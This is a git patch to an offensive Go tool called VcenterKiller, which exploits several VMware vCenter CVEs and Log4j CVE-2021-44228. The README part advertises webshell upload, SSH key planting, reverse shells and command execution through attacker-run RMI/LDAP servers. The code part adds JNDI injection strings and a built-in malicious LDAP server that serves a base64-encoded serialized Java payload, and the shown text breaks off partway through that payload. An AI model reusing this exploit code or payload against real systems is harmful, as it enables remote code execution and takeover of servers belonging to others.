From c286282b0c88ca30c4e817a04cfe67c33f2a2530 Mon Sep 17 00:00:00 2001 From: root Date: Sat, 15 Oct 2022 17:32:49 +0800 Subject: [PATCH] 1.3.5 --- README.md | 16 +++------- go.mod | 2 ++ go.sum | 4 +++ main.go | 3 ++ src/log4jcenter/log4j.go | 48 ++++++++++++++-------------- src/log4jcenter/server.go | 67 +++++++++++++++++++++++++++++++++++++++ 6 files changed, 105 insertions(+), 35 deletions(-) create mode 100644 src/log4jcenter/server.go diff --git a/README.md b/README.md index be7a2a7..e6676c1 100644 --- a/README.md +++ b/README.md @@ -3,21 +3,13 @@ # VcenterKiller #### 0.必读 -目前本工具处于刚上线阶段,可能会有很多BUG,如果遇到bug请提issue - - - -写这个工具单纯是为了方便,它没有什么高大上的东西 - - - -目前集成了对Vcenter log4j漏洞的检测和利用功能,思路来自于带哥[@j5s](https://github.com/j5s)的项目[SuperFastjsonScan](https://github.com/j5s/SuperFastjsonScan),原理参考[Golang实现RMI协议自动化检测Fastjson](https://www.anquanke.com/post/id/249402),简单来说就是不借助dnslog之类的平台,只要你和目标主机是通的并且你的主机/跳板没有被防火墙做端口限制,那就能直接验证目标是否进行了远程调用。 +如果遇到bug请提issue,写这个工具单纯是为了方便,它没有什么高大上的东西 #### 1.它是什么 -一款针对Vcenter(暂时)的综合**验证**工具,包含目前最主流的CVE-2021-21972、CVE-2021-21985以及CVE-2021-22005,提供一键上传webshell,命令执行或者上传公钥并使用SSH连接的功能,以及针对Apache Log4j CVE-2021-44228漏洞在Vcenter上的检测以及利用,比如命令执行并获取回显(需要一个ldap恶意服务器)。 +一款针对Vcenter的综合**验证**工具,包含目前最主流的CVE-2021-21972、CVE-2021-21985以及CVE-2021-22005,提供一键上传webshell,命令执行或者上传公钥并使用SSH连接的功能,以及针对Apache Log4j CVE-2021-44228漏洞在Vcenter上的检测以及利用,比如命令执行并获取回显(~~需要一个ldap恶意服务器~~),现在不需要另外启动ldap服务器了,我根据jndi-injection工具手搓了一个利用方式,Vcenter使用的中间件是Tomcat,直接使用TomcatBypass的利用链就行了。 #### 2.它的定位 @@ -36,8 +28,7 @@ go build -o main.exe ./main.exe -u https://192.168.1.1 -m 21972 -f id_rsa.pub -t ssh //传公钥 ./main.exe -u https://192.168.1.1 -m 21985 -t rshell -r rmi://xx.xx.xx.xx:1099/xx ./main.exe -u https://192.168.1.1 -m log4center -t scan // scan log4j -./main.exe -u https://192.168.1.1 -m log4center -t rshell -r rmi://xx.xx.xx.xx:1099/xx //get reverseshell and other -./main.exe -u https://192.168.1.1 -m log4center -t exec -r ldap://xx.xx.xx.xx:1389 -c whoami //execute command +./main.exe -u https://192.168.1.1 -m log4center -t exec -r ldap://xx.xx.xx.xx:1389 -c whoami //也可以不指定ldap服务 ./main.exe -u https://xx.xx.com -m 22954 whoami ./main.exe -u https://xx.xx.com -m 22972 //get cookie ./main.exe -u https://xx.xx.com -m 31656 //If CVE-2022-22972不能用就换CVE-2022-31656 @@ -62,6 +53,7 @@ V1.3.1 修复了检测log4j时忽略了端口的问题,有的服务会更改 V1.3.2 修改了针对log4j的利用方式,通过tomcatbypassEcho的方式执行命令并获取回显。vcenter 7.0 linux测试通过。 V1.3.3 增加了对6.7和7.0版本的区别利用,7.0必须使用tomcatbypass,而6.7使用普通的basic就行了 v1.3.4 修改了对log4j的验证逻辑,目前的逻辑是循环5次不同payload无差别乱打,有回显就有,没有就没有 +v1.3.5 消除了log4j对Jndi-Injection-Exploit的依赖,能够直接执行命令并获取回显 ... ``` diff --git a/go.mod b/go.mod index f3365e6..2d3ea6e 100644 --- a/go.mod +++ b/go.mod @@ -13,6 +13,7 @@ require ( github.com/hashicorp/errwrap v1.1.0 // indirect github.com/hashicorp/go-multierror v1.1.1 // indirect github.com/imroc/req/v3 v3.24.0 // indirect + github.com/lor00x/goldap v0.0.0-20180618054307-a546dffdd1a3 // indirect github.com/lucas-clemente/quic-go v0.28.1 // indirect github.com/marten-seemann/qpack v0.2.1 // indirect github.com/marten-seemann/qtls-go1-16 v0.1.5 // indirect @@ -23,6 +24,7 @@ require ( github.com/mattn/go-isatty v0.0.14 // indirect github.com/nxadm/tail v1.4.8 // indirect github.com/onsi/ginkgo v1.16.5 // indirect + github.com/vjeantet/ldapserver v1.0.1 // indirect golang.org/x/crypto v0.0.0-20220722155217-630584e8d5aa // indirect golang.org/x/mod v0.6.0-dev.0.20220419223038-86c51ed26bb4 // indirect golang.org/x/net v0.0.0-20220802222814-0bcc04d9c69b // indirect diff --git a/go.sum b/go.sum index 75a48f9..d946ede 100644 --- a/go.sum +++ b/go.sum @@ -86,6 +86,8 @@ github.com/kr/pretty v0.1.0/go.mod h1:dAy3ld7l9f0ibDNOQOHHMYYIIbhfbHSm3C4ZsoJORN github.com/kr/pty v1.1.1/go.mod h1:pFQYn66WHrOpPYNljwOMqo10TkYh1fy3cYio2l3bCsQ= github.com/kr/pty v1.1.3/go.mod h1:pFQYn66WHrOpPYNljwOMqo10TkYh1fy3cYio2l3bCsQ= github.com/kr/text v0.1.0/go.mod h1:4Jbv+DJW3UT/LiOwJeYQe1efqtUx/iVham/4vfdArNI= +github.com/lor00x/goldap v0.0.0-20180618054307-a546dffdd1a3 h1:wIONC+HMNRqmWBjuMxhatuSzHaljStc4gjDeKycxy0A= +github.com/lor00x/goldap v0.0.0-20180618054307-a546dffdd1a3/go.mod h1:37YR9jabpiIxsb8X9VCIx8qFOjTDIIrIHHODa8C4gz0= github.com/lucas-clemente/quic-go v0.28.1 h1:Uo0lvVxWg5la9gflIF9lwa39ONq85Xq2D91YNEIslzU= github.com/lucas-clemente/quic-go v0.28.1/go.mod h1:oGz5DKK41cJt5+773+BSO9BXDsREY4HLf7+0odGAPO0= github.com/lunixbochs/vtclean v1.0.0/go.mod h1:pHhQNgMf3btfWnGBVipUOjRYhoOsdGqdm/+2c2E2WMI= @@ -163,6 +165,8 @@ github.com/stretchr/testify v1.5.1/go.mod h1:5W2xD1RspED5o8YsWQXVCued0rvSQ+mT+I5 github.com/tarm/serial v0.0.0-20180830185346-98f6abe2eb07/go.mod h1:kDXzergiv9cbyO7IOYJZWg1U88JhDg3PB6klq9Hg2pA= github.com/viant/assertly v0.4.8/go.mod h1:aGifi++jvCrUaklKEKT0BU95igDNaqkvz+49uaYMPRU= github.com/viant/toolbox v0.24.0/go.mod h1:OxMCG57V0PXuIP2HNQrtJf2CjqdmbrOx5EkMILuUhzM= +github.com/vjeantet/ldapserver v1.0.1 h1:3z+TCXhwwDLJC3pZCNbuECPDqC2x1R7qQQbswB1Qwoc= +github.com/vjeantet/ldapserver v1.0.1/go.mod h1:YvUqhu5vYhmbcLReMLrm/Tq3S7Yj43kSVFvvol6Lh6k= github.com/yuin/goldmark v1.2.1/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74= github.com/yuin/goldmark v1.3.5/go.mod h1:mwnBkeHKe2W/ZEtQ+71ViKU8L12m81fl3OWwC1Zlc8k= github.com/yuin/goldmark v1.4.13/go.mod h1:6yULJ656Px+3vBD8DxQVa3kxgyrAnzto9xy5taEt/CY= diff --git a/main.go b/main.go index c1b1203..8333786 100644 --- a/main.go +++ b/main.go @@ -117,7 +117,10 @@ func main() { usage() os.Exit(0) } else { + + go log4jcenter.Start_server() log4jcenter.Execc(url, rmi, command) + } } else { diff --git a/src/log4jcenter/log4j.go b/src/log4jcenter/log4j.go index df8d17b..f735356 100644 --- a/src/log4jcenter/log4j.go +++ b/src/log4jcenter/log4j.go @@ -130,26 +130,28 @@ func exploit(url, rmiserver string) { } -func exec_cmd(url, rmiserver, command, version string) (bool, string) { - host := rmiserver +func exec_cmd(url, rmiserver, command, cmd, uri string) (bool, string) { + host := "" + if rmiserver == "" { + target := strings.TrimLeft(url, "https://") + host = getIpAddr2(target) + // fmt.Println(host) + } else { + host = rmiserver + } + client := req.C() client.EnableForceHTTP1() // client.DisableAutoReadResponse() // client.SetUnixSocket("1.sock") client.EnableInsecureSkipVerify() client.DisableAutoReadResponse() - client.SetTimeout(4 * time.Second) + client.SetTimeout(2 * time.Second) // client.SetProxyURL("http://127.0.0.1:8080") //尽量别用burp做代理,burp2022.8会启用http2,导致vcenter报错403 rmi_server := "" - cmd := "" - if version == "6" { - rmi_server = fmt.Sprintf("${jndi:%s/Basic/TomcatEcho}", host) - cmd = command + " && echo nmsl" - } else { - rmi_server = fmt.Sprintf("${jndi:%s/TomcatBypass/TomcatEcho}", host) - cmd = command + ";echo 'nmsl'" - } - _ = cmd + cmd = command + cmd + rmi_server = fmt.Sprintf("${jndi:ldap://%s:1389%s}", host, uri) + // fmt.Println(rmi_server) myheader := map[string]string{ "User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", @@ -203,18 +205,18 @@ func exec_cmd(url, rmiserver, command, version string) (bool, string) { } func Execc(url, rmiserver, command string) { - for i := 0; i < 5; i++ { - temp1, temp2 := exec_cmd(url, rmiserver, command, "7") - if temp1 { - fmt.Println(temp2) - return - } - temp3, temp4 := exec_cmd(url, rmiserver, command, "6") - if temp3 { - fmt.Println(temp4) - return - } + + temp1, temp2 := exec_cmd(url, rmiserver, command, ";echo nmsl", "/TomcatBypass/TomcatEcho") + if temp1 { + fmt.Println(temp2) + return + } + temp3, temp4 := exec_cmd(url, rmiserver, command, " && echo nmsl", "/TomcatBypass/TomcatEcho") + if temp3 { + fmt.Println(temp4) + return } + fmt.Println("[-] 利用失败或不存在漏洞.") } diff --git a/src/log4jcenter/server.go b/src/log4jcenter/server.go new file mode 100644 index 0000000..c6f5e72 --- /dev/null +++ b/src/log4jcenter/server.go @@ -0,0 +1,67 @@ +package log4jcenter + +import ( + "encoding/base64" + "fmt" + "sync" + "time" + + "github.com/lor00x/goldap/message" + ldap "github.com/vjeantet/ldapserver" +) + +var q sync.WaitGroup + +func Start_server() { + + //Create a new LDAP Server + + ldap.Logger = ldap.DiscardingLogger + server := ldap.NewServer() + routes := ldap.NewRouteMux() + routes.Bind(handleBind) + routes.Search(handleSearch) + server.ReadTimeout = time.Second * 100 + server.Handle(routes) + + q.Add(1) + go server.ListenAndServe(":1389") + q.Wait() + +} + +func handleSearch(w ldap.ResponseWriter, m *ldap.Message) { + r := m.GetSearchRequest() + + e := ldap.NewSearchResultEntry("") + + if r.BaseObject() == "TomcatBypass/TomcatEcho" { + payload, _ := base64.RawStdEncoding.DecodeString("rO0ABXNyAB1vcmcuYXBhY2hlLm5hbWluZy5SZXNvdXJjZVJlZgAAAAAAAAABAgAAeHIAHW9yZy5hcGFjaGUubmFtaW5nLkFic3RyYWN0UmVmAAAAAAAAAAECAAB4cgAWamF2YXgubmFtaW5nLlJlZmVyZW5jZejGnqKo6Y0JAgAETAAFYWRkcnN0ABJMamF2YS91dGlsL1ZlY3RvcjtMAAxjbGFzc0ZhY3Rvcnl0ABJMamF2YS9sYW5nL1N0cmluZztMABRjbGFzc0ZhY3RvcnlMb2NhdGlvbnEAfgAETAAJY2xhc3NOYW1lcQB+AAR4cHNyABBqYXZhLnV0aWwuVmVjdG9y2Zd9W4A7rwEDAANJABFjYXBhY2l0eUluY3JlbWVudEkADGVsZW1lbnRDb3VudFsAC2VsZW1lbnREYXRhdAATW0xqYXZhL2xhbmcvT2JqZWN0O3hwAAAAAAAAAAV1cgATW0xqYXZhLmxhbmcuT2JqZWN0O5DOWJ8QcylsAgAAeHAAAAAKc3IAGmphdmF4Lm5hbWluZy5TdHJpbmdSZWZBZGRyhEv0POER3MkCAAFMAAhjb250ZW50c3EAfgAEeHIAFGphdmF4Lm5hbWluZy5SZWZBZGRy66AHmgI4r0oCAAFMAAhhZGRyVHlwZXEAfgAEeHB0AAVzY29wZXQAAHNxAH4AC3QABGF1dGhxAH4AD3NxAH4AC3QACXNpbmdsZXRvbnQABHRydWVzcQB+AAt0AAtmb3JjZVN0cmluZ3QABng9ZXZhbHNxAH4AC3QAAXh0H3F7IiIuZ2V0Q2xhc3MoKS5mb3JOYW1lKCJqYXZheC5zY3JpcHQuU2NyaXB0RW5naW5lTWFuYWdlciIpLm5ld0luc3RhbmNlKCkuZ2V0RW5naW5lQnlOYW1lKCJKYXZhU2NyaXB0IikuZXZhbCgidmFyIGJ5dGVzID0gb3JnLmFwYWNoZS50b21jYXQudXRpbC5jb2RlYy5iaW5hcnkuQmFzZTY0LmRlY29kZUJhc2U2NCgneXY2NnZnQUFBRE1CR3dvQVRRQ1FDZ0NSQUpJS0FKRUFrd2dBbEFvQVRBQ1ZCd0JuQ2dDUkFKWUlBSmNLQUIwQW1BZ0FtUWdBbWdjQW13Z0FuQWdBakFnQW5RY0FuZ2dBbndjQW9Bc0FFZ0NoQ3dBU0FLSUlBS01LQUJvQXBBZ0FwUWNBcGdvQUdBQ25Cd0NvQ2dDcEFLb0lBS3NIQUt3SUFLMEtBQjBBcmdnQXJ3a0FJZ0N3QndDeENnQWlBTElJQUxNSUFMUUlBTFVLQUxZQXR3b0FIUUM0Q0FDNUNBQzZDQUM3Q0FDOENBQzlCd0MrQndDL0NnQXZBTUFLQUM4QXdRb0F3Z0REQ2dBdUFNUUlBTVVLQUM0QXhnb0FMZ0RIQ2dBZEFNZ0tBRXdBeVFvQXRnREtDZ0RMQU13S0FCQUF6UWdBemdvQUdBRFBDZ0FZQU5BSUFORUhBSGdLQUJnQTBnZ0Ewd2NBMUFnQTFRZ0ExZ29BR0FEWEJ3RFlDZ0FZQU5rS0FFY0EyZ29BMndEY0NnRGJBTjBIQU40SEFOOEJBQVk4YVc1cGRENEJBQU1vS1ZZQkFBUkRiMlJsQVFBUFRHbHVaVTUxYldKbGNsUmhZbXhsQVFBU1RHOWpZV3hXWVhKcFlXSnNaVlJoWW14bEFRQUZkbUZ5TVRNQkFCVk1hbUYyWVM5c1lXNW5MMFY0WTJWd2RHbHZianNCQUFWMllYSXhNZ0VBRTF0TWFtRjJZUzlzWVc1bkwxTjBjbWx1WnpzQkFBVjJZWEl4TVFFQUVreHFZWFpoTDJ4aGJtY3ZUMkpxWldOME93RUFCSFpoY2pJQkFBVjJZWEl4TUFFQUFVa0JBQVIyWVhJNUFRQVFUR3BoZG1FdmRYUnBiQzlNYVhOME93RUFCSFpoY2pFQkFBUjJZWEl6QVFBU1RHcGhkbUV2YkdGdVp5OVRkSEpwYm1jN0FRQUVkbUZ5TndFQUVreHFZWFpoTDJ4aGJtY3ZWR2h5WldGa093RUFCSFpoY2pZQkFBUjJZWEkwQVFBQldnRUFCSFpoY2pVQkFCTmJUR3BoZG1FdmJHRnVaeTlVYUhKbFlXUTdBUUFCWlFFQUJIUm9hWE1CQUM1TVkyOXRMMlpsYVdodmJtY3ZiR1JoY0M5MFpXMXdiR0YwWlM5VWIyMWpZWFJGWTJodlZHVnRjR3hoZEdVN0FRQU5VM1JoWTJ0TllYQlVZV0pzWlFjQTNnY0E0QWNBckFjQXFBY0FuZ2NBb0FjQVZnRUFDWGR5YVhSbFFtOWtlUUVBRnloTWFtRjJZUzlzWVc1bkwwOWlhbVZqZER0YlFpbFdBUUFSVEdwaGRtRXZiR0Z1Wnk5RGJHRnpjenNCQUNGTWFtRjJZUzlzWVc1bkwwNXZVM1ZqYUUxbGRHaHZaRVY0WTJWd2RHbHZianNCQUFSMllYSXdBUUFDVzBJSEFOUUhBS1lCQUFwRmVHTmxjSFJwYjI1ekFRQUZaMlYwUmxZQkFEZ29UR3BoZG1FdmJHRnVaeTlQWW1wbFkzUTdUR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdLVXhxWVhaaEwyeGhibWN2VDJKcVpXTjBPd0VBSUV4cVlYWmhMMnhoYm1jdlRtOVRkV05vUm1sbGJHUkZlR05sY0hScGIyNDdBUUFaVEdwaGRtRXZiR0Z1Wnk5eVpXWnNaV04wTDBacFpXeGtPd2NBNFFjQTJBRUFDWFJ5WVc1elptOXliUUVBY2loTVkyOXRMM04xYmk5dmNtY3ZZWEJoWTJobEwzaGhiR0Z1TDJsdWRHVnlibUZzTDNoemJIUmpMMFJQVFR0YlRHTnZiUzl6ZFc0dmIzSm5MMkZ3WVdOb1pTOTRiV3d2YVc1MFpYSnVZV3d2YzJWeWFXRnNhWHBsY2k5VFpYSnBZV3hwZW1GMGFXOXVTR0Z1Wkd4bGNqc3BWZ0VBQ0dSdlkzVnRaVzUwQVFBdFRHTnZiUzl6ZFc0dmIzSm5MMkZ3WVdOb1pTOTRZV3hoYmk5cGJuUmxjbTVoYkM5NGMyeDBZeTlFVDAwN0FRQUlhR0Z1Wkd4bGNuTUJBRUpiVEdOdmJTOXpkVzR2YjNKbkwyRndZV05vWlM5NGJXd3ZhVzUwWlhKdVlXd3ZjMlZ5YVdGc2FYcGxjaTlUWlhKcFlXeHBlbUYwYVc5dVNHRnVaR3hsY2pzSEFPSUJBS1lvVEdOdmJTOXpkVzR2YjNKbkwyRndZV05vWlM5NFlXeGhiaTlwYm5SbGNtNWhiQzk0YzJ4MFl5OUVUMDA3VEdOdmJTOXpkVzR2YjNKbkwyRndZV05vWlM5NGJXd3ZhVzUwWlhKdVlXd3ZaSFJ0TDBSVVRVRjRhWE5KZEdWeVlYUnZjanRNWTI5dEwzTjFiaTl2Y21jdllYQmhZMmhsTDNodGJDOXBiblJsY201aGJDOXpaWEpwWVd4cGVtVnlMMU5sY21saGJHbDZZWFJwYjI1SVlXNWtiR1Z5T3lsV0FRQUlhWFJsY21GMGIzSUJBRFZNWTI5dEwzTjFiaTl2Y21jdllYQmhZMmhsTDNodGJDOXBiblJsY201aGJDOWtkRzB2UkZSTlFYaHBjMGwwWlhKaGRHOXlPd0VBQjJoaGJtUnNaWElCQUVGTVkyOXRMM04xYmk5dmNtY3ZZWEJoWTJobEwzaHRiQzlwYm5SbGNtNWhiQzl6WlhKcFlXeHBlbVZ5TDFObGNtbGhiR2w2WVhScGIyNUlZVzVrYkdWeU93RUFDbE52ZFhKalpVWnBiR1VCQUJkVWIyMWpZWFJGWTJodlZHVnRjR3hoZEdVdWFtRjJZUXdBVGdCUEJ3RGdEQURqQU9RTUFPVUE1Z0VBQjNSb2NtVmhaSE1NQUh3QWZRd0E1d0RvQVFBRVpYaGxZd3dBNlFEcUFRQUVhSFIwY0FFQUJuUmhjbWRsZEFFQUVtcGhkbUV2YkdGdVp5OVNkVzV1WVdKc1pRRUFCblJvYVhNa01BRUFCbWRzYjJKaGJBRUFFMnBoZG1FdmJHRnVaeTlGZUdObGNIUnBiMjRCQUFwd2NtOWpaWE56YjNKekFRQU9hbUYyWVM5MWRHbHNMMHhwYzNRTUFPc0E3QXdBN1FEdUFRQURjbVZ4REFEdkFQQUJBQXRuWlhSU1pYTndiMjV6WlFFQUQycGhkbUV2YkdGdVp5OURiR0Z6Y3d3QThRRHlBUUFRYW1GMllTOXNZVzVuTDA5aWFtVmpkQWNBOHd3QTlBRDFBUUFKWjJWMFNHVmhaR1Z5QVFBUWFtRjJZUzlzWVc1bkwxTjBjbWx1WndFQUNGUmxjM1JsWTJodkRBRDJBUGNCQUFselpYUlRkR0YwZFhNTUFQZ0FkUUVBRVdwaGRtRXZiR0Z1Wnk5SmJuUmxaMlZ5REFCT0FQa0JBQWxoWkdSSVpXRmtaWElCQUFOamJXUUJBQWR2Y3k1dVlXMWxCd0Q2REFEN0FQd01BUDBBNkFFQUJuZHBibVJ2ZHdFQUIyTnRaQzVsZUdVQkFBSXZZd0VBQnk5aWFXNHZjMmdCQUFJdFl3RUFFV3BoZG1FdmRYUnBiQzlUWTJGdWJtVnlBUUFZYW1GMllTOXNZVzVuTDFCeWIyTmxjM05DZFdsc1pHVnlEQUJPQVA0TUFQOEJBQWNCQVF3QkFnRUREQUJPQVFRQkFBSmNRUXdCQlFFR0RBRUhBT2dNQVFnQkNRd0Fjd0IwREFFS0FRc0hBUXdNQVEwQTZBd0JEZ0JQQVFBa2IzSm5MbUZ3WVdOb1pTNTBiMjFqWVhRdWRYUnBiQzVpZFdZdVFubDBaVU5vZFc1ckRBRVBBUkFNQVJFQkVnRUFDSE5sZEVKNWRHVnpEQUVUQVBJQkFBZGtiMWR5YVhSbEFRQWZhbUYyWVM5c1lXNW5MMDV2VTNWamFFMWxkR2h2WkVWNFkyVndkR2x2YmdFQUUycGhkbUV1Ym1sdkxrSjVkR1ZDZFdabVpYSUJBQVIzY21Gd0RBRVVBUlVCQUI1cVlYWmhMMnhoYm1jdlRtOVRkV05vUm1sbGJHUkZlR05sY0hScGIyNE1BUllBOEF3QVRnRVhCd0RoREFFWUFSa01BTzBCR2dFQUxHTnZiUzltWldsb2IyNW5MMnhrWVhBdmRHVnRjR3hoZEdVdlZHOXRZMkYwUldOb2IxUmxiWEJzWVhSbEFRQkFZMjl0TDNOMWJpOXZjbWN2WVhCaFkyaGxMM2hoYkdGdUwybHVkR1Z5Ym1Gc0wzaHpiSFJqTDNKMWJuUnBiV1V2UVdKemRISmhZM1JVY21GdWMyeGxkQUVBRUdwaGRtRXZiR0Z1Wnk5VWFISmxZV1FCQUJkcVlYWmhMMnhoYm1jdmNtVm1iR1ZqZEM5R2FXVnNaQUVBT1dOdmJTOXpkVzR2YjNKbkwyRndZV05vWlM5NFlXeGhiaTlwYm5SbGNtNWhiQzk0YzJ4MFl5OVVjbUZ1YzJ4bGRFVjRZMlZ3ZEdsdmJnRUFEV04xY25KbGJuUlVhSEpsWVdRQkFCUW9LVXhxWVhaaEwyeGhibWN2VkdoeVpXRmtPd0VBRG1kbGRGUm9jbVZoWkVkeWIzVndBUUFaS0NsTWFtRjJZUzlzWVc1bkwxUm9jbVZoWkVkeWIzVndPd0VBQjJkbGRFNWhiV1VCQUJRb0tVeHFZWFpoTDJ4aGJtY3ZVM1J5YVc1bk93RUFDR052Ym5SaGFXNXpBUUFiS0V4cVlYWmhMMnhoYm1jdlEyaGhjbE5sY1hWbGJtTmxPeWxhQVFBRWMybDZaUUVBQXlncFNRRUFBMmRsZEFFQUZTaEpLVXhxWVhaaEwyeGhibWN2VDJKcVpXTjBPd0VBQ0dkbGRFTnNZWE56QVFBVEtDbE1hbUYyWVM5c1lXNW5MME5zWVhOek93RUFDV2RsZEUxbGRHaHZaQUVBUUNoTWFtRjJZUzlzWVc1bkwxTjBjbWx1Wnp0YlRHcGhkbUV2YkdGdVp5OURiR0Z6Y3pzcFRHcGhkbUV2YkdGdVp5OXlaV1pzWldOMEwwMWxkR2h2WkRzQkFCaHFZWFpoTDJ4aGJtY3ZjbVZtYkdWamRDOU5aWFJvYjJRQkFBWnBiblp2YTJVQkFEa29UR3BoZG1FdmJHRnVaeTlQWW1wbFkzUTdXMHhxWVhaaEwyeGhibWN2VDJKcVpXTjBPeWxNYW1GMllTOXNZVzVuTDA5aWFtVmpkRHNCQUFkcGMwVnRjSFI1QVFBREtDbGFBUUFFVkZsUVJRRUFCQ2hKS1ZZQkFCQnFZWFpoTDJ4aGJtY3ZVM2x6ZEdWdEFRQUxaMlYwVUhKdmNHVnlkSGtCQUNZb1RHcGhkbUV2YkdGdVp5OVRkSEpwYm1jN0tVeHFZWFpoTDJ4aGJtY3ZVM1J5YVc1bk93RUFDM1J2VEc5M1pYSkRZWE5sQVFBV0tGdE1hbUYyWVM5c1lXNW5MMU4wY21sdVp6c3BWZ0VBQlhOMFlYSjBBUUFWS0NsTWFtRjJZUzlzWVc1bkwxQnliMk5sYzNNN0FRQVJhbUYyWVM5c1lXNW5MMUJ5YjJObGMzTUJBQTVuWlhSSmJuQjFkRk4wY21WaGJRRUFGeWdwVEdwaGRtRXZhVzh2U1c1d2RYUlRkSEpsWVcwN0FRQVlLRXhxWVhaaEwybHZMMGx1Y0hWMFUzUnlaV0Z0T3lsV0FRQU1kWE5sUkdWc2FXMXBkR1Z5QVFBbktFeHFZWFpoTDJ4aGJtY3ZVM1J5YVc1bk95bE1hbUYyWVM5MWRHbHNMMU5qWVc1dVpYSTdBUUFFYm1WNGRBRUFDR2RsZEVKNWRHVnpBUUFFS0NsYlFnRUFEV2RsZEZCeWIzQmxjblJwWlhNQkFCZ29LVXhxWVhaaEwzVjBhV3d2VUhKdmNHVnlkR2xsY3pzQkFCUnFZWFpoTDNWMGFXd3ZVSEp2Y0dWeWRHbGxjd0VBQ0hSdlUzUnlhVzVuQVFBUGNISnBiblJUZEdGamExUnlZV05sQVFBSFptOXlUbUZ0WlFFQUpTaE1hbUYyWVM5c1lXNW5MMU4wY21sdVp6c3BUR3BoZG1FdmJHRnVaeTlEYkdGemN6c0JBQXR1WlhkSmJuTjBZVzVqWlFFQUZDZ3BUR3BoZG1FdmJHRnVaeTlQWW1wbFkzUTdBUUFSWjJWMFJHVmpiR0Z5WldSTlpYUm9iMlFCQUJCblpYUkVaV05zWVhKbFpFWnBaV3hrQVFBdEtFeHFZWFpoTDJ4aGJtY3ZVM1J5YVc1bk95bE1hbUYyWVM5c1lXNW5MM0psWm14bFkzUXZSbWxsYkdRN0FRQU5aMlYwVTNWd1pYSmpiR0Z6Y3dFQUZTaE1hbUYyWVM5c1lXNW5MMU4wY21sdVp6c3BWZ0VBRFhObGRFRmpZMlZ6YzJsaWJHVUJBQVFvV2lsV0FRQW1LRXhxWVhaaEwyeGhibWN2VDJKcVpXTjBPeWxNYW1GMllTOXNZVzVuTDA5aWFtVmpkRHNBSVFCTUFFMEFBQUFBQUFVQUFRQk9BRThBQVFCUUFBQUVFZ0FJQUF3QUFBSklLcmNBQVFNOHVBQUN0Z0FERWdTNEFBWEFBQWJBQUFaTkF6NGRMTDZpQWlJc0hUSTZCQmtFeGdJU0dRUzJBQWM2QlJrRkVnaTJBQW1hQWdFWkJSSUt0Z0FKbVFIM0dRUVNDN2dBQlRvR0dRYkJBQXlaQWVZWkJoSU51QUFGRWc2NEFBVVNEN2dBQlRvR3B3QUlPZ2VuQWNzWkJoSVJ1QUFGd0FBU09nY0ROZ2dWQ0JrSHVRQVRBUUNpQWFrWkJ4VUl1UUFVQWdBNkNSa0pFaFc0QUFVNkJoa0d0Z0FXRWhjRHZRQVl0Z0FaR1FZRHZRQWF0Z0FiT2dvWkJyWUFGaEljQkwwQUdGa0RFaDFUdGdBWkdRWUV2UUFhV1FNU0hsTzJBQnZBQUIwNkJSa0Z4Z0JrR1FXMkFCK2FBRndaQ3JZQUZoSWdCTDBBR0ZrRHNnQWhVN1lBR1JrS0JMMEFHbGtEdXdBaVdSRUF5TGNBSTFPMkFCdFhHUXEyQUJZU0pBVzlBQmhaQXhJZFUxa0VFaDFUdGdBWkdRb0Z2UUFhV1FNU0hsTlpCQmtGVTdZQUcxY0VQQmtHdGdBV0Vod0V2UUFZV1FNU0hWTzJBQmtaQmdTOUFCcFpBeElsVTdZQUc4QUFIVG9GR1FYR0FKa1pCYllBSDVvQWtSa0t0Z0FXRWlBRXZRQVlXUU95QUNGVHRnQVpHUW9FdlFBYVdRTzdBQ0paRVFESXR3QWpVN1lBRzFjU0pyZ0FKN1lBS0JJcHRnQUptUUFaQnIwQUhWa0RFaXBUV1FRU0sxTlpCUmtGVTZjQUZnYTlBQjFaQXhJc1Uxa0VFaTFUV1FVWkJWTTZDeGtLdXdBdVdic0FMMWtaQzdjQU1MWUFNYllBTXJjQU14STB0Z0ExdGdBMnRnQTN1QUE0QkR3WkJjWUFDeGtGdGdBZm1RQVZHNWtBRVJrS3VBQTV0Z0E2dGdBM3VBQTRHNWtBQnFjQUNZUUlBYWYrVVJ1WkFBYW5BQW1FQXdHbi9kNm5BQWhNSzdZQU83RUFBZ0JXQUdrQWJBQVFBQVFDUHdKQ0FCQUFBd0JSQUFBQXFnQXFBQUFBRGdBRUFCQUFCZ0FSQUJnQUV3QWdBQlFBSlFBVkFDb0FGZ0F4QUJjQVJRQVlBRTRBR1FCV0FCc0FhUUFlQUd3QUhBQnVBQjBBY1FBZ0FIMEFJZ0NNQUNNQWx3QWtBS0FBSlFDNUFDWUEzd0FuQU93QUtBRVhBQ2tCUXdBcUFVVUFMUUZyQUM0QmVBQXZBYU1BTUFIZUFERUNCQUF5QWdZQU5RSVhBRFlDSlFBNUFpa0FPZ0lzQUNJQ01nQStBallBUHdJNUFCTUNQd0JIQWtJQVJRSkRBRVlDUndCSUFGSUFBQUNPQUE0QWJnQURBRk1BVkFBSEFkNEFLQUJWQUZZQUN3Q1hBWlVBVndCWUFBa0F1UUZ6QUZrQVdBQUtBSUFCc2dCYUFGc0FDQUI5QWJ3QVhBQmRBQWNBVGdIckFGNEFXQUFHQURFQ0NBQmZBR0FBQlFBbEFoUUFZUUJpQUFRQUdnSWxBR01BV3dBREFBWUNPUUJrQUdVQUFRQVlBaWNBWmdCbkFBSUNRd0FFQUdnQVZBQUJBQUFDU0FCcEFHb0FBQUJyQUFBQVpBQVEvd0FhQUFRSEFHd0JCd0FHQVFBQS93QlJBQWNIQUd3QkJ3QUdBUWNBYlFjQWJnY0Fid0FCQndCd0JQMEFEZ2NBY1FIOUFNUUhBRzhIQUcvN0FJTlNCd0J5S1F3UitRQUcrZ0FGL3dBR0FBUUhBR3dCQndBR0FRQUErQUFGUWdjQWNBUUFDZ0J6QUhRQUFnQlFBQUFCVndBSUFBVUFBQUN1RWp5NEFEMU9MYllBUGswdEVqOEd2UUFZV1FNU1FGTlpCTElBSVZOWkJiSUFJVk8yQUVFc0JyMEFHbGtESzFOWkJMc0FJbGtEdHdBalUxa0Z1d0FpV1N1K3R3QWpVN1lBRzFjcXRnQVdFa0lFdlFBWVdRTXRVN1lBR1NvRXZRQWFXUU1zVTdZQUcxZW5BRVU2QkJKRXVBQTlUaTBTUlFTOUFCaFpBeEpBVTdZQVFTMEV2UUFhV1FNclU3WUFHMDBxdGdBV0VrSUV2